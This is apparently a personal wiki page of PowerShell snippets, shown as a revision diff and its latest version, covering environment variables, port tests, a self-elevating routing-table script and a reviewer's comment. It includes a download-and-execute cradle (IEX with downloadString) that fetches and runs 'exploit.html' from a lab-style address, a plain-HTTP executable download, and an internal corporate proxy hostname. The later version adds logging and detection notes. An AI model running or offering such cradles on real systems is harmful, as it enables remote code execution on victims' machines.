Difference between revisions of "PowerShell"

From RHS Wiki
(Created page with "== Modify Routing Table == <source lang="PowerShell">param([switch]$Elevated) function Check-Admin { $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security...")
 
m
Tag: visualeditor
 
(6 intermediate revisions by the same user not shown)
Line 1: Line 1:
== Modify Routing Table ==
+
==Set environment variable==
<source lang="PowerShell">param([switch]$Elevated)
+
<syntaxhighlight lang="powershell">
 +
$env:DEBUG=$true
 +
</syntaxhighlight>
 +
 
 +
== Download file ==
 +
<syntaxhighlight lang="dos">
 +
powershell "(new-object System.Net.WebClient).Downloadfile('http://<IP>/writeup.exe', 'writeup.exe')"
 +
</syntaxhighlight>
 +
 
 +
==Execute code from web==
 +
<syntaxhighlight lang="powershell">
 +
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8:8000/exploit.html')"
 +
</syntaxhighlight>
 +
 
 +
== Networking ==
 +
 
 +
=== Test Port open ===
 +
<syntaxhighlight lang="powershell">
 +
Test-NetConnection -ComputerName webproxy.global.basf.net -Port 8080
 +
</syntaxhighlight>
 +
 
 +
===Modify Routing Table===
 +
<source lang="PowerShell">param([switch]$Elevated)
 
function Check-Admin {
 
function Check-Admin {
$currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
+
    $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
$currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
+
    $currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
 
}
 
}
 
if ((Check-Admin) -eq $false)  {
 
if ((Check-Admin) -eq $false)  {
if ($elevated)
+
    if ($elevated)
{
+
    {
# could not elevate, quit
+
        # could not elevate, quit
}
+
    }
 
   
 
   
 
else {
 
else {
+
        Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
+
    }
}
+
    exit
exit
 
 
}
 
}
  
 
#eliminar ruta por defecto al haber 2 y a;ade ruta a vsphere
 
#eliminar ruta por defecto al haber 2 y a;ade ruta a vsphere
 
 
route delete 0.0.0.0 mask 0.0.0.0 15.17.160.1
 
route delete 0.0.0.0 mask 0.0.0.0 15.17.160.1
 
 
route add 20.1.40.0 mask 255.255.255.0 15.17.160.1
 
route add 20.1.40.0 mask 255.255.255.0 15.17.160.1
 
 
Start-Sleep -s 2
 
Start-Sleep -s 2
 
 
exit</source>
 
exit</source>
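Review bot: The added "Test Port open" example hard-codes what looks like an internal proxy hostname (`webproxy.global.basf.net`) and the "Execute code from web" example hard-codes a lab address, while the "Download file" example already uses the `<IP>` placeholder. Internal names and addresses on a wiki page disclose network layout to anyone who can read it; I would write `Test-NetConnection -ComputerName <HOST> -Port <PORT>` and use `<IP>:<PORT>` in the other URL as well. In the re-indented routing script the `if ($elevated)` branch still contains only the comment `# could not elevate, quit`, so a failed elevation exits with no output; `Write-Error 'Could not elevate; routing table was not modified.'` in that branch would make the failure visible.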

Latest revision as of 07:55, 21 April 2022

Set environment variable[edit]

# Set DEBUG for the current PowerShell process (child processes inherit it).
# Environment values are strings, so $true is stored as "True".
Set-Item -Path Env:DEBUG -Value $true

Download file[edit]

REM Run from cmd.exe: WebClient.DownloadFile fetches the URL and writes it to writeup.exe
REM in the current directory. The URL is plain HTTP, so the transfer is not encrypted and
REM nothing here verifies the file's integrity.
REM Detection: with command-line process auditing enabled, this appears as powershell.exe
REM with System.Net.WebClient / Downloadfile in its arguments (Security event 4688).
powershell "(new-object System.Net.WebClient).Downloadfile('http://<IP>/writeup.exe', 'writeup.exe')"

Execute code from web[edit]

# downloadString returns the HTTP response body as text and IEX (Invoke-Expression) runs
# that text in the new powershell process, so the script itself is not written to disk.
# Detection: with script block logging enabled the executed text is recorded as event 4104
# in Microsoft-Windows-PowerShell/Operational, and on PowerShell 5+ it is passed to AMSI
# before it runs; the command line also shows IEX together with Net.WebClient.
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8:8000/exploit.html')"

Networking[edit]

Test Port open[edit]

# Attempt a TCP connection to the host on the given port; the TcpTestSucceeded
# property of the result reports whether the port accepted the connection.
$target = @{
    ComputerName = 'webproxy.global.basf.net'
    Port         = 8080
}
Test-NetConnection @target

Modify Routing Table[edit]

param([switch]$Elevated)
function Check-Admin {
    # Returns $true when the token of the current process is in the built-in
    # Administrators role, $false otherwise. Under UAC an administrator account
    # running unelevated holds a filtered token and therefore reports $false.
    $identity = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal -ArgumentList $identity
    return $principal.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}
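# Route changes need administrator rights. When the session is not elevated,
# relaunch this script through UAC and stop the unelevated copy.
if ((Check-Admin) -eq $false) {
    if ($Elevated) {
        # This copy was already started with -elevated and is still not an
        # administrator. Relaunching again would loop, so report the failure
        # instead of exiting silently and signal it through the exit code.
        Write-Error 'Could not elevate; routing table was not modified.'
        exit 1
    }
    else {
        # -Verb RunAs requests elevation (UAC prompt). The script path is passed
        # in double quotes so paths containing spaces survive, and -elevated
        # marks the new process as the relaunched copy.
        Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
    }
    # The unelevated copy has nothing more to do.
    exit
}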

# Two default routes are present: remove the one through 15.17.160.1 and add a
# route to the vSphere network through that gateway instead.
# Neither change uses -p, so both last only until the next reboot.
route.exe delete 0.0.0.0 mask 0.0.0.0 15.17.160.1
route.exe add 20.1.40.0 mask 255.255.255.0 15.17.160.1

# Short pause before exiting (presumably so the route output can be read).
Start-Sleep -Seconds 2
exit